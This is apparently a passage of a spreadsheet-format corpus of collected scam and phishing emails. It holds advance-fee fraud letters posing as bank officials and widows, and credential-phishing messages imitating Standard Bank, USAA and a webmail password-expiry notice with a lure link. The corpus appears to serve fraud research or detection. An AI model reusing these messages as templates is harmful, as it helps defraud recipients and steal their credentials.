comme hritier du dfunt afin de \ndevenir bnficiaire de ce fond. Le choix d'un tranger pour jouer ce rle \nrvle du fait qu'un burkinab ne peut pas se prsenter comme hritier(e) de \nnotre dfunt client Nous acceptons que vous aurez les 30% du partage,mon \ncollgue et moi aurons les 60% alors que 10% seront consacrs aux dpenses \nsurvenues lors du transfert. Une fois ce fond transfr, mon  collgue et \nmoi viendrons sur place chez vous en vue du partage, conformment aux \npourcentages sus indiqus. Ainsi vous devez me donner toutes vos \ncoordonnes, ce qui me permettra de mieux vous connatre et de vous envoyer \nle texte d'application(demande de transfert).Je vous rassure que ce business \nest  100%sans risque et que vous ne devrez mettre en vous aucun atome de \ncrainte. Veuillez croire cher monsieur, l'expression de mes considrations.\n\nDistingue.\n\nMerci .\n\nPATRICE KONE (Esq.)\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://news.bbc.co.uk http://messenger.msn.click-url.com</t>
  </si>
  <si>
    <t>2234</t>
  </si>
  <si>
    <t>To: ben_coroma75@latinmail.com &lt;ben_coroma75@latinmail.com&gt;\nFrom: ben coroma &lt;ben_coroma75@latinmail.com&gt;\nDate: Tue, 20 Jun 2006 09:34:14 +0200</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2006 09:34:14 +0200</t>
  </si>
  <si>
    <t>ben coroma &lt;ben_coroma75@latinmail.com&gt;</t>
  </si>
  <si>
    <t>ben_coroma75@latinmail.com &lt;ben_coroma75@latinmail.com&gt;</t>
  </si>
  <si>
    <t>TREAT VERY CONFIDENTIAL &amp; URGENT RESPONSE.</t>
  </si>
  <si>
    <t>FROM THE DESK OF BEN COROMA (ESQ).\nTHE HEAD OF FILE DEPARTMENT, AFRICAN\nDEVELOPMENT BANK (ADB)\nOUAGADOUGOU BURKINA-FASO WEST AFRICA.\nPHONE: 00226-7885 7597.\nPLANE CRASH WEB SITE...[URL]http://news.bbc.co.uk[/URL] \n \n                     ("REMITTANCE OF $15 MILLION U.S.A DOLLARS\n                                CONFIDENTIAL IS THE CASE")\n                                  \nCOMLIMENTS OF THE SEASON 2006,\n\nFIRST, I MUST SOLICIT YOUR CONFIDENCE IN THIS TRANSACTION.THIS IS BY \nVIRTUE OF ITS NATURE AS BEING UTTERLY CONFIDENTIAL AND TOP SECRET. \nHOWEVER AFTER SERIES OF PETITION WAS RECIEVED BY THIS PRESENT REGIME FROM FOREIGN CONTRACTORS AND INABILITY OF THE BANK OF AFRICA (ADB)TO FULFILL THEIR OBLIGATION FOR THE PAYMENT TO ITS FOREIGN CREDITORS, IN CONJUNCTION WITH THE COUNCIL OF MINISTERS, THEY MANDATED US TO CARRY OUT A CAREFUL AND COMPREHENSIVE REVIEW OF ALL OVERDUE PAYMENTS TO FOREIGN CONTRACTORS AND TO EFFECT PAYMENTS IMMEDIATELY.\n\nDURING THE ABOVE MENTIONED PROCESS, WE DISCOVERED AN ABANDONED SUM OF US$15 M (FIFTEEN MILLION US DOLLARS) IN AN ACCOUNT THAT BELONGS TO ONE OF OUR FOREIGN CUSTOMER WHO DIED ALONG WITH HIS ENTIRE FAMILY IN A PLANE CRASH THAT HAPPENED IN (MONDAY 31ST JULY 2000).SINCE WE GOT INFORMATION ABOUT \nHIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT UNLESS SOME BODY APPLIES FOR IT AS NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN OUR BANKING GUIDELINES AND LAWS BUT UNFORTUNATELY WE LEARNT THAT ALL HIS SUPPOSED NEXT OF KIN OR RELATION DIED ALONGSIDE WITH HIM AT THE PLANE CRASH LEAVING NOBODY BEHIND FOR THE CLAIM.\n \nIT IS THEREFORE UPON THIS DISCOVERY THAT I AND OTHER OFFICIALS IN MY \nDEPARTMENT NOW DECIDED TO MAKE THIS BUSINESS PROPOSAL TO YOU AND RELEASE THE MONEY TO YOU AS THE NEXT OF KIN OR RELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY IS COMING FOR IT AND WE DON'T WANT THIS MONEY TO GO INTO THE BANK TREASURY AS UNCLAIMED BILL.\n\nI AGREE THAT 40% OF THIS MONEY WILL BE FOR YOU AS A FOREIGN PARTNER, IN RESPECT TO THE PROVISION OF A FOREIGN ACCOUNT,AND 50% WOULD BE FOR ME, WHILE 10% WILL BE FOR EXPENSES INCURE DURING THE TRANSACTION. THERE AFTER I WILL VISIT YOUR COUNTRY FOR DISBURSEMENT ACCORDING TO THE PERCENTAGE INDICATED.THEREFORE, TO ENABLE THE IMMEDIATE TRANSFER OF THIS FUND TO YOU AS ARRANGED, YOU MUST APPLY FIRST TO THE BANK AS RELATION OR NEXT OF KIN OF THE DECEASED INDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR PRIVATE TELEPHONE AND FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHEREIN THE MONEY WILL BE REMITTED.\n\nUPON THE RECEIPT OF YOUR REPLY, I WILL SEND TO YOU BY EMAIL THE TEXT OF THE APPLICATION TO FILL AND SEND TO THE BANK. I WILL NOT FAIL TO BRING TO YOUR NOTICE THAT THIS TRANSACTION IS HITCH-FREE RISK AND THIS TRANSACTION WILL ONLY TAKE US 14 BANKING DAYS BECAUSE AS A BANKER, I KNOW WHAT TO DO AND MOVE THE FUND INTO YOUR ACCOUNT WITHOUT ANY DELAY AND THATYOU SHOULD NOT ENTERTAIN ANY ATOM OF FEAR AS ALL REQUIRED ARRANGEMENT HAVE BEEN MADE FOR THE TRANSFER.\n\nYOU SHOULD CONTACT ME OM MY NUMBER 00226-7885 7597 AS SOON AS YOU RECEIVE THIS LETTER SO THAT I WILL SEND YOU THE TEXT OF THE APPLICATION TO APPLY TO THE BANK AND THE DATA INFORMATION OF THE DECEASED .\n\nYOUR'S FAITHFULLY,\n\nBEN COROMA (ESQ).\n FROM (ADB) OUAGADOUGOU BURKINA-FASO.\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>1562</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Help Center\n	&lt;info.help-center.co.za_info.help-center.co.za_info.help-center.co.za177005@em5269.xfund02.ml&gt;\nDate: Tue, 20 Dec 2022 23:00:27 +0000 (UTC)</t>
  </si>
  <si>
    <t>Tue, 20 Dec 2022 23:00:27 +0000 (UTC)</t>
  </si>
  <si>
    <t>HELLO</t>
  </si>
  <si>
    <t>https://netflix.com https://netflix.com https://netflix.com</t>
  </si>
  <si>
    <t>1071</t>
  </si>
  <si>
    <t>To: Recipients &lt;ingrid.barnaby@aps-associate.co.uk&gt;\nFrom: Standard Bank &lt;ingrid.barnaby@aps-associate.co.uk&gt;\nDate: Tue, 20 Aug 2019 13:10:22 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2019 13:10:22 -0700</t>
  </si>
  <si>
    <t>Standard Bank &lt;ingrid.barnaby@aps-associate.co.uk&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;ingrid.barnaby@aps-associate.co.uk&gt;</t>
  </si>
  <si>
    <t>Standard Bank Account eStatement 19-08-21</t>
  </si>
  <si>
    <t>Dear Customer   Please find your electronic statement for August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 and we will effect the change within thirty (30) days of receipt of your instruction.    To open your eStatement, you will need Adobe Acrobat software (free to download from adobe.com). Regards,  Standard Bank 	  	    For any queries please  call us on 0861201311 Our lines are open from 8am to 9pm Monday to Friday and 8am to 4pm on weekends  and public holidays.             Copyright Standard Bank. All rights reserved. The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Authorised financial services provider. Registered credit provider NCR CP15. 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 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 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 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 For more information about Standard Bank Group Limited see [URL]www.standardbank.co.za[/URL]  Dear Customer Please find your electronic statement for August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and we will effect the change within thirty (30) days of receipt of your instruction.  To open your eStatement, you will need Adobe Acrobat software (free to download from adobe.com).Regards, Standard Bank   For any queries please call us on 0861201311Our lines are open from8am to 9pm Monday to Fridayand 8am to 4pm on weekends and public holidays.  Copyright Standard Bank. All rights reserved.The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Authorised financial services provider.Registered credit provider NCR CP15.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For more information about Standard Bank Group Limited see [URL]www.standardbank.co.za[/URL]  ï»¿ Standard Bank Online Banking AutoShare/Tax Free Invest Do you want to link your account to your profile? yes no Sign out                   Hello!                                   We've enhanced the sign in feature on our new, fresh Online Banking site.                 Your password has been successfully changed. Sign in Email address Please enter a valid email address By signing in you agree to the                                           T&amp;C'sLast updated on 5 July 2017                                                                                      Next                                                                                         Two steps to quick &amp; easy sign in:Start by entering your email, then your password.                                            Register for online banking                               Your password has been successfully changed.                                Sign in Email address Please enter a valid email address                                        By signing in you accept the                                         terms and conditionsLast updated on 5 July 2017                                                                                Next                                          By signing in you accept the  terms and conditions Last updated on 5 July 2017                                                                                         Sign in                                            Register for online banking                               Received an online banking for business invitation?                                                              START HERE                                Customer Care 0800 222 050 International +27 10 249 0070 These details donât seem to be right. Please check and try again                         Password Sign-In                                              Sign in                                                 {Curent_Email}                          Password Invalid Password                                 Forgot password?                                                              Sign in                                                                  Cancel                              South Africa 0860 123 000 International +27 11 299 4701 Email us at ibsupport@standardbank.co.za Standard Bank is a licensed                    financial services provider in terms of the Financial Advisory and                    Intermediary Services Act and a registered credit provider in terms of                    the National Credit Act, registration number NCRCP15.                 Loading ‐ please wait a moment Due to account inactivity you will be automatically signed out in  seconds. Continue banking? Continue Sign out</t>
  </si>
  <si>
    <t>2522</t>
  </si>
  <si>
    <t>To: nan\nFrom: Saviour Toya &lt;saviourtoya19@hotmail.fr&gt;\nDate: Tue, 19 Sep 2006 15:37:29 +0000</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2006 15:37:29 +0000</t>
  </si>
  <si>
    <t>Saviour Toya &lt;saviourtoya19@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM MRS.TOYA</t>
  </si>
  <si>
    <t>Dear Friend,\n\nI am Mrs.Saviour Toya from Ivory Coast. I am a widow being\nthat I lost my husband a couple of some years ago. My\nhusband was a serving director of the Cocoa exporting board\nuntil his death . He was assassinated January 2002 by the\nrebels following the political uprising.Before his death he\nhad a huge sum of money up to the tune of $9 Million\ndollars that he deposited in one of the banks here in Cte\nd'Ivoire which he made my son Micheal Toya as the next of\nkin to the money.\n\nI want you to do me a favour to receive this funds to a\nsafe account in your country or any safer place as the\nbeneficiary so that i will come over to your country with\nmy only son.\n\nI have plans to do investment in your country, like real\nestate and industrial production. This is my reason for\nwriting to you. Please if you are willing to assist me and\nmy only son, indicate your interest in replying soonest i\nwill ofer you 20% of the total money.\n\nThanks and best regards .\nMrs. Saviour Toya and Son\n\n_________________________________________________________________\nTen : profite de ton  Messenger en  illimit sur ton mobile !  \n[URL]http://mobile.live.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2524</t>
  </si>
  <si>
    <t>To: nan\nFrom: charles soludo &lt;infocenbank1@egypt.com&gt;\nDate: Tue, 19 Sep 2006 11:40:11 -0400</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2006 11:40:11 -0400</t>
  </si>
  <si>
    <t>charles soludo &lt;infocenbank1@egypt.com&gt;</t>
  </si>
  <si>
    <t>IMMEDIATE PAYMENT</t>
  </si>
  <si>
    <t>\n\n\n\n\n\n            CENTRAL BANK OF NIGERIA\n             TINUBU SQUARE,VICTORIA ISLAND,LAGOS.\n           FEDERAL REPUBLIC OF NIGERIA\n\n From the Desk Of:\nProf Charles Soludo\nExecutive Governor (CBN)\n\nIMMEDIATE PAYMENT REF: CBN/IRD/CBX/021/06\n\n\nTHIS IS AN OFFICIAL NOTIFICATION OF FUNDS DEPOSITED IN YOUR NAME AND IT IS NOT\nA SALES SOLICITATION.\n\nI am professor Charles.c. Soludo governor, central bank of Nigeria (  \nCBN ). The\nmentioned bank is known for  the safekeeping of special and valuable packages\nand baggage in trust for reputable clients that are honest and trustworthy.\n\nWe work in collaboration with top firms and Governments of various  \ncountries as\nwe have earned a name as a service whose hallmarks in reliability and\nconfidentiality are revered. International missions and Embassies of the world\nhave used our services to satisfaction.\n\nA benefactor whose identity can not be disclosed because of the Non\nCircumvention and Non Disclosure Agreement that was signed with the said\nbenefactor when the funds were being deposited in the Central Bank of Nigeria,\nmade you the beneficiary of a package containing some amount of money and\nstated clearly that you should only be contacted when the time signed  \nfor it to\nbe in our care elapses and the time has already elapsed that is why you are\nbeing contacted.\n\nThe Non Circumvention and Non Disclosure Agreement signed with the benefactor\nmandates us to fully divulge and disclose the benefactor's identity 18 months\nafter you, the beneficiary has received the funds.\n\nThe funds totals $5.000,000 (Five Million Dollars) i shall reconfirm to you\nare fully free of any liens, or encumbrances and are clean, clear and non-\ncriminal origin and are available in the form of CASH.\n\nYou are hereby advised to reconfirm your Full Contact Information for\nverification with information contained in our computer database as well as\nother relevant information in the format stated below so that the funds would\nbe arranged by the deplomats who will be moving the funds from the  \nCentral Bank\nof Nigeria to be brought to you.\n\nI would also inform you clearly here that you must procure an affidavit of\nclaim of ownership before the  comensment of the diplomat bringing the  \nfunds to\nyou, this you will be informed as soon as your information is received.\n\nThe  Diplomats shall accompany you to your bank (if you want them to) to\ndeposit the funds in your name and submit all documentations of proof of the\norigin of the funds in other to exonerate you from any form of investigations\nor interrogation and to authenticate the fact that the funds are clean and has\nno links whatsoever with either drugs or terrorism.\n\nThe Requested Information is to ensure that no mistake or error is made and it\nshould be forwarded\n\nin the manner stated below:\n\nYour Full Name: ______________________________\n\nYour Complete Address (Physical Address with Zip Code not\nP.O.BOX) : ______________________________\n\nName of City of Residence:_______________________________\n\nCountry:____________________________________\n\nDirect Telephone Number:\n____________________________________\n\nMobile\nNumber:____________________________________\n\nFax\nNumber:___________________________________\n\nFinally your age and sex very impotant too please note this.\n\nThe Contact Numbers are very necessary because the number would be called\nbefore the funds would be handed over to the Deplomats so as to ensure  \nthat the\npackage is handed over to the right person.So, it is mandatory you send your\nDirect Telephone Number preferably your Mobile or Cell Phone Number.\n\nComplete the above and send back to me through my  E-mail address  \nbelow as soon\nas possible.\n\nCongratulations in advance.\n\n  YOURS SINCERELY,\n\n\n\nPROFESSOR CHARLES C. SOLUDO,\nGOVERNOR, CENTRAL BANK OF NIGERIA (CBN).\n  PRIVATE E-MAIL: prof_charles.soludocbn@gawab.com\n\n****PRIVATE &amp; CONFIDENTIAL*****\nThis e-mail and any attached files are confidential and may be legally\nprivileged.\n\nIf you are not the addressee, any disclosure, reproduction,\ncopying,distribution, or other dissemination or use of this communication is\nstrictly prohibited.\n\n\n\n\n\n\n\n----------------------------------------------------------------\nReserve your free e-mail@egypt.com, [URL]http://www.egypt.com[/URL]\nSpam free &amp; Virus clean web based mail service\nReport abuse to abuse@egypt.com\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.egypt.com</t>
  </si>
  <si>
    <t>2521</t>
  </si>
  <si>
    <t>To: nan\nFrom: Noel PANGA &lt;panga67@hotmail.fr&gt;\nDate: Tue, 19 Sep 2006 03:36:43 +0000</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2006 03:36:43 +0000</t>
  </si>
  <si>
    <t>Noel PANGA &lt;panga67@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>Mr Noel PANGA.</t>
  </si>
  <si>
    <t>GOOD MORNING.\n\n\nDONT BE OFFENDED IF I MAY HAVE DISTURBED YOUR DAILY ACTIVITIES.\n\n\nMY NAME IS MR NOEL PANGA, I AM A BANKER, AND I WORK WITH THE AFRICAN \nDEVELOPMENT BANK AS A SENIOR STAFF. I HAVE DECIDED TO CONTACT YOU ON A \nBUSINESS TRANSACTION THAT WILL BE VERY BENEFICIAL TO BOTH OF US AT THE END \nOF THE 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18.4M (EIGHTEEN MILLION,FOUR HUNDRED THOUSAND UNITED \nSTATES DOLLARS). AS IT MAY INTEREST YOU TO KNOW, I GOT YOUR IMPRESSIVE \nCONTACTS THROUGH INTERNET. MEANWHILE ALL THE WHOLE ARRANGEMENT TO PUT CLAIM \nOVER THIS FUND AS THE BONAFIDE NEXT OF KIN TO THE DECEASED, AND TRANSFER \nTHIS MONEY TO A FOREIGN ACCOUNT HAS BEEN PUT IN PLACE.  THE DIRECTIVES AND \nNEEDED INFORMATION WILL BE RELAYED TO YOU AS SOON AS YOU INDICATE YOUR \nINTEREST AND WILLINGNESS TO ASSIST ME, AND ALSO BENEFIT YOUR SELF TO THIS \n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50% WILL BE FOR ME.  PLEASE, YOU HAVE BEEN ADVICED TO \nKEEP "TOP SECRET" AS I AM STILL IN SERVICE AND INTEND TO RETIRE FROM SERVICE \n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F THE TRANSACTION INTEREST YOU, GET BACK TO ME WITH YOUR PHONE NUMBER TO \nCALL YOU SO WE COULD PROCEED.\n\n\nTHANKS.\n\nMR NOEL PANGA.\n\n_________________________________________________________________\nWindows Live Spaces : crez votre Space  votre image ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1442</t>
  </si>
  <si>
    <t>To: &lt;jose@monkey.org&gt;\nFrom: "Monkey.org-Notification" &lt;esther@grahamcarrmw.com&gt;\nDate: Tue, 19 Jul 2022 17:32:53 +0000</t>
  </si>
  <si>
    <t>Tue, 19 Jul 2022 17:32:53 +0000</t>
  </si>
  <si>
    <t>"Monkey.org-Notification" &lt;esther@grahamcarrmw.com&gt;</t>
  </si>
  <si>
    <t>!Alert jose@monkey.org Passsword Expire.</t>
  </si>
  <si>
    <t>monkey.org WEBMAIL   Hello jose, Your jose@monkey.org password is set to Expire today, Tuesday, July 19, 2022   Click and Keep Same Password  [URL]http://el.uwdav.institutodesperta.com.br[/URL]   monkey.org Support          !Alert jose@monkey.org Passsword Expire.       monkey.org WEBMAIL    Hello jose,  Your jose@monkey.org password is set to Expire today,  Tuesday, July 19, 2022   Click and Keep Same Password    monkey.org Support</t>
  </si>
  <si>
    <t>http://el.uwdav.institutodesperta.com.br</t>
  </si>
  <si>
    <t>1407</t>
  </si>
  <si>
    <t>To: nan\nFrom: ALI MARTINS &lt;drmartinsali@africanunion-developmentbank.net&gt;\nDate: Tue, 19 Jul 2005 18:39:32 +0000</t>
  </si>
  <si>
    <t>Tue, 19 Jul 2005 18:39:32 +0000</t>
  </si>
  <si>
    <t>ALI MARTINS &lt;drmartinsali@africanunion-developmentbank.net&gt;</t>
  </si>
  <si>
    <t>pravite business proposal</t>
  </si>
  <si>
    <t>(A.U.D.B) AFRICAN UNION DEVELOPMENT BANK PLC.\nDESK OF :DR.Martins Ali\nRC NO :  A4568UD\n\n\nDear Sir,\n\nI have a proposal for you, this however is not\nmandatory nor will I in  any manner compel you to\nhonour against your will.\n\nI am Dr,Martins Ali and work with African Union\nDevelopment Bank Plc  (one of the African leading\nbanks in the West Coast). Here in this bank existed a\ndormant account for the  past 8 years which belong to\na American national who is now late Mr Morris\nThompson who died on Alaska Airlines Flight 261. For\nfurther enquiry view the web-site for more details.\n\n[URL]http://archives.cnn.com[/URL]\nMore details about the deceased himself,you can check\non\n([URL]http://www.nativefederation.org[/URL]\n\nWhen I discovered that there had been no deposits nor\nwithdrawals from  this account for this long period, I\ndecided to carry out a system  investigation and\ndiscovered that non of the family member nor relations\nof the late  person is aware of this account. This is\nthe story in a nutshell.\n\nNow I want an account overseas where thses fund  will\nbe transfer according to the due process of our bank\nin order to avoid voilation of any country and\ninternational Monetory law on fund transfer.\n\nThereafter,I had planned to destroy all related\ndocuments for this account. It is  a careful network\nand for the past eleven months I have worked out\neverything to ensure a hitch-free operation. The\namount is not so much at the  moment and plus all the\naccumulated interest the balance in this account\nstands at-(US$15.million US dollars).\n\nNow my questions are:-\n1. Can you handle this project?\n2. Can I give you this trust?\n3. What will be your commission? If you can sponsor\nthis transfer.\n\nConsider this and get back to me as soon as possible.\n\nFinally, it is our humble prayer that the information\nas contained  herein be accorded the necessary\nattention, urgency as well as the secrecy it\ndeserves.\n\nI Expect your urgent response if you can handle this\nproject.\n\nI look forward to receiving your prompt response.\n\nRespectfully yours,\n\nDr.Martins Ali.\nAFRICAN UNION DEVELOPMENT BANK PLC.\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://archives.cnn.com http://www.nativefederation.org</t>
  </si>
  <si>
    <t>969</t>
  </si>
  <si>
    <t>To: De-Ann Hughes &lt;De-Ann.Hughes@stcg.ac.uk&gt;\nFrom: De-Ann Hughes &lt;De-Ann.Hughes@stcg.ac.uk&gt;\nDate: Tue, 19 Feb 2019 18:35:01 +0000</t>
  </si>
  <si>
    <t>Tue, 19 Feb 2019 18:35:01 +0000</t>
  </si>
  <si>
    <t>De-Ann Hughes &lt;De-Ann.Hughes@stcg.ac.uk&gt;</t>
  </si>
  <si>
    <t>Re: # e-mail upgrade</t>
  </si>
  <si>
    <t>http://www.microsoft.com</t>
  </si>
  <si>
    <t>2807</t>
  </si>
  <si>
    <t>To: nan\nFrom: Dr.Ali Ibrahim &lt;dr_aliibrahim3@hotmail.fr&gt;\nDate: Tue, 19 Dec 2006 20:44:23 +0100</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2006 20:44:23 +0100</t>
  </si>
  <si>
    <t>Dr.Ali Ibrahim &lt;dr_aliibrahim3@hotmail.fr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">GOOD DAY PLEASE REPLY ME SOONEST </t>
  </si>
  <si>
    <t>FROM THE DESK OF DR ALI IBRAHIM.\nBILL AND EXCHANGE MANAGER\nFOREIGN REMITTANCE DEPT.\nAFRICA DEVELOPMENT BANK (ADB)\nOUAGADOUGOU, BURKINA FASO.\n\n\n\n\nDear friend ,\n\nI am the manager of bill and exchange at FOREIGN REMITTANCE DEPT.AFRICA \nDEVELOPMENT BANK (ADB)I am writing, following the impressive information \nabout you through one of my friends who runs a consultancy firm in your \ncountry. He assured me of your capability and releability to champion this\nbusiness opportunity.\n\nIn my department we discovered an abandoned sum of U.S$10m US dollars (Ten \nMillion US dollars) in an account that belongs to one of our foreign \ncustomer who died along with his entire family on Monday,31 July, 2000,in a \nplane crash. Since we got information about his death, we have been \nexpecting his next of kin to come over and claim his money because we cannot \nrelease it unless\nsomebody applies for it as next of kin or relation to the deceased as \nindicated in our banking guidlines and laws but unfortunately we learnt that \nall his supposed next of kin or relation died alongside with him at the \nplane crash leaving nobody behind for the claim. It is therefore upon this\ndiscovery that I and other officials in my department now decided to make \nthis business proposal to you and release the money to you as the next of \nkin or relation to the deceased for safety and subsequent disbursement since \nnobody is coming for it and we don't want this money to go into the\nbank treasury as unclaimed bill. The banking law and guidline here \nstipulates that if such money\nremained unclaimed after four years, the money will be transfered into the \nbank treasury as unclaimed fund. The request of foreign as next of kin in \nthis business is occassioned by the fact that the customer was a foreigner \nand a Burkinabe cannot stand as next of kin to a foreigner.\n\nWe agree that 30% of this money will be for you as a foreign partner, in \nrespect to the provision of a foreign account, 5% will be set aside for \nexpenses incured during the business and 65% would be for me and my \ncolleagues. There after I and my colleagues will visit your country for \ndisbursement according to the percentages indicated.\n\nTherefore, to enable the immediate transfer of this fund to you as arranged, \nyou must apply first to the bank as relation or next of kin of the deceased \nindicating your bank name, your bank account number, your private telephone \nand fax number for easy and effective communication and location\nwherein the money will be remitted.\n\nUpon receipt of your reply, I will send to you by fax or e-mail the text of \nthe application. I will not fail to bring to your notice that this \ntransaction is risk-free and that you should not entertain any atom of fear \nas all required arrangements have been made for the transfer.\nYou should contact me immediately as soon as you receive this letter for \nmore explanations.\n\nYours faithfully,\nDR ALI IBRAHIM..\n\n_________________________________________________________________\nWindows Live Messenger sur i-mode : dialoguez avec vos amis depuis votre \nmobile comme sur PC ! [URL]http://mobile.live.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2805</t>
  </si>
  <si>
    <t>To: nan\nFrom: monica edmond &lt;monica_edmond4@hotmail.fr&gt;\nDate: Tue, 19 Dec 2006 09:39:16 +0100</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2006 09:39:16 +0100</t>
  </si>
  <si>
    <t>monica edmond &lt;monica_edmond4@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>From Mrs. monica edmond</t>
  </si>
  <si>
    <t>&gt;From Mrs. monica edmond\nPLOT 23 Felix Avenue\nAbidjan  Cote d Ivoire.\n\n\nHello Friend,\n\nPlease excurse me if i have infringe into your privacy.this may be\nstrange any way but i have no option but cry out . having gone through your\nprofile i think i am convince you are the right fellow to confide this to.\n\nIt is my pleasure to contact you for a business venture which I and my Son, \nintend to establish in your country.\nThough I have not met with you before but I believe, one has to risk\nconfiding in someone to succeed sometimes in life.\n\nThere is this amount of Eight million, five hundred thousand United\nState Dollars($8.500,000) which my late Husband deposited with a security\ncompany in Abidjan Capital city of Cote d'Ivoire which he wanted to\nused for his political reason in our Country before he was assassinated.\n\nNow I and my son have decided to invest these money in your country or\nanywhere safe enough outside Africa for security and political reasons.\nWe want you to help us claim and receive the consignment which will be\nsent to you through diplomatic means to your address to avoid any\ntraces of the funds and to enable you plan for the investment in your\nCountry:\n\nI will like to invest part of the money into these three investment\nin your Country but, if there is any other business that is better than\nwhat I am suggestion, I will be very glad to follow your advice.\n\n1). Real estate\n2). The transport industry\n3). Five star hotel\n\nIf you can be of an assistance to us we will be pleased to offer to you\n20% Of the total fund while the balance will be invested by you.\n\nI await your response soonest\nRespectfully yours,\nMrs monica edmond\n\n_________________________________________________________________\nLes révélations de la starac 6 commentées par Jérémy! \n[URL]http://starac2006.spaces.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>208</t>
  </si>
  <si>
    <t>To: Recipients &lt;usaaproject@usa.com&gt;\nFrom: "USAA" &lt;usaaproject@usa.com&gt;\nDate: Tue, 19 Apr 2016 08:11:21 -0400</t>
  </si>
  <si>
    <t>Tue, 19 Apr 2016 08:11:21 -0400</t>
  </si>
  <si>
    <t>"USAA" &lt;usaaproject@usa.com&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;usaaproject@usa.com&gt;</t>
  </si>
  <si>
    <t>Important Notification</t>
  </si>
  <si>
    <t>Dear Member,     In an effort to safeguard your information, USAA helps to actively protect and monitor your account in multiple ways. Logon to update your account to avoid been compromised. We are constantly developing new security features so that you can be a member of a more secure world.    Heres what you need to do:  For immediate and continious access to your account now follow  [URL]www.usaa.com[/URL]&lt; /a&gt;  and follow the prompted instructions, once completed USAA will unauthourize any fraudulent access.   We value our relationship with you and thank you for choosing USAA.     Sincerely,   USAA Online Team   Dear Member, In an effort to safeguard your information, USAA helps to actively  protect and monitor your account in multiple ways. Logon to update your account  to avoid been compromised. We are constantly developing new security features  so that you can be a member of a more secure world. Here’s what you need to do: For immediate and continious access to your account now follow [URL]www.usaa.com[/URL]&lt; /a&gt; and follow the prompted instructions, once completed USAA will unauthourize any  fraudulent access.  We value our relationship with you and thank you for choosing USAA. Sincerely,  USAA Online Team</t>
  </si>
  <si>
    <t>www.usaa.com www.usaa.com</t>
  </si>
  <si>
    <t>3329</t>
  </si>
  <si>
    <t>To: nan\nFrom: Dr Usman Ibrahim Danko &lt;drusmanibrahimtg08@hotmail.fr&gt;\nDate: Tue, 18 Sep 2007 10:54:53 +0000</t>
  </si>
  <si>
    <t>Tue, 18 Sep 2007 10:54:53 +0000</t>
  </si>
  <si>
    <t>Dr Usman Ibrahim Danko &lt;drusmanibrahimtg08@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>From Dr Usman Ibrahim / Mr Wahid Yoffe property.</t>
  </si>
  <si>
    <t>\nFROM DR USMAN IBRAHIM DANKO.AUDITING AND ACCOUNTING UNIT.FOREIGN OPERATIONS DEPARTMENT.BANQUE TOGOLAISE POUR LE COMMERCE ET L'INDUSTRIE,LOME- TOGO. \n \nDear Friend,             I do not intend to cause any grief to you. The reason for sending this mail is very fundamental to the doctrine of human privileges and right. My name is Dr Usman Ibrahim Danko  I am quite convicned of the fact that this will come to you as a surprise.however I am writing based on the privlage information I garthered about you in internet during my extensive search for a repose foreign partner who is compitent of assisting me in below business proposal. I am the principal manager controlling the auditing and accounting section of Banque Togolaise Pour Le Commerce Et L'Inustrie Lome Togo. in West Africa with due respect and regard. \n \nI have decided to contact you on a business transaction that will be very beneficial to both of us at the end of the transaction. During our investigation and auditing in this bank, my department came across a very huge sum of money belonging to a deceased person Mr Wahid Yoffe who died in the horrific Asian tsunamis of Dec. 26, 2004, that has killed more than all 20th- century tsunamis combined that happened in Sumatra island, Indonesia. \n \n&gt;From the information that our bank have gotten so far, the Tsunami killed him with his entire family and no none relation have been identified. The person that he used as his next of kin was his first son of 25 years old who died along side with the entire family. Although personally, I keep this information secret within myself and partner to enable the whole plans and idea be Profitable and successful during the time of execution. The said amount was (US$11.4M). \n \nMeanwhile all the whole arrangement to put claim over this fund as the bonafide next of kin to the deceased, get the required approval and transfer this money to a foreign account has been put in place and directives and needed information will be relayed to you as soon as you indicate your interest and willingness to assist us and also benefit your self to this great business opportunity that comes once in life. In fact I could have done this deal alone but because of my position in this country as a civil servant, we are not allowed to perate a foreign account and would eventually raise an eye brow on my side during the time of transfer because I work in this bank. \n \nThis is the actual reason why it will require a second party or fellow who will forward claims as the next of kin with affidavit of trust of oath to the Bank and also resent a foreign account where he will need the money to be re-transferred in to on his request as it may be after due verification and clarification by the correspondent branch of the bank where the whole money will be remitted from to your own designation bank account. \n \nMay I at this point emphasize that this transaction is 100% risk free as I have made arrangements for a successful deal before contacting you. On smooth conclusion of this transaction, you will be entitled to 30% of the total sum as gratification, while 5% will be set aside to take care of expenses that may arise during the time of transfer processing and also telephone bills, while 65% will be for me and my partner. \n \nPlease, you have been adviced to keep top secret as 